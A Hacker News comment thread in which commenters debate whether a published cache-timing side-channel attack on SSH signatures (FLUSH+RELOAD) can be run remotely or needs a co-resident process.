Hacker News new | past | comments | ask | show | jobs | submit login

From section 5.2, Attacking SSH (emphasis mine):

"...our client saves the hash of the concatenated string and the digital signature raw bytes sent from the server. All subsequent messages, including SSH_MSG_NEWKEYS and any client responses, are not required by our attack. Our client therefore drops the connection at this stage, and repeats this process several hundred times to build up a set of distinct trace, digital signature, and digest tuples. See Section 6 for our explicit attack parameters. Figure 3 is a typical signal extracted by our spy program in parallel to the handshake between our client and the victim SSH server."

This inclines me to believe that an attack can be executed via connections to a vulnerable SSH server, not from a local process on the SSH server.




This is the only point where I wish the paper was more clear...

"Similar to Section 5.1, we wrote a custom SSH client that launches our spy program, the spy program collects the timing signals during the handshake. At the same time it performs an SSH handshake where the protocol messages and the digital signature are collected for our attack."

I think that 'spy process' must be local to observe the low-level cache timings they are using to perform the attack, but I haven't found anywhere they come out and say that explicitly.


Exactly. The paper is frustratingly unclear on what the exploit scenario is.

"...we wrote a custom SSH client that launches our spy program, the spy program collects the timing signals during the handshake..."

I have a bad feeling that this means an attacker with a custom client can extract private key information over the network by repeatedly establishing connections with a vulnerable server.


I believe they're talking about a test harness they built, to synchronize collection of cache traces with the execution of the handshake. FLUSH+RELOAD requires a co-resident attacker (they need to be on the same hardware, though not necessarily the same VM).


Random network delays would probably hide any meaningful timing signal in the case of remote connections, thus they used a local process.


One might expect this to be the default case, but it may not be so, given a large enough sample size.


Found further discussion here: http://seclists.org/oss-sec/2016/q2/514


One would presumably not be seeding keys with data pulled from network delays. Too predictable.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: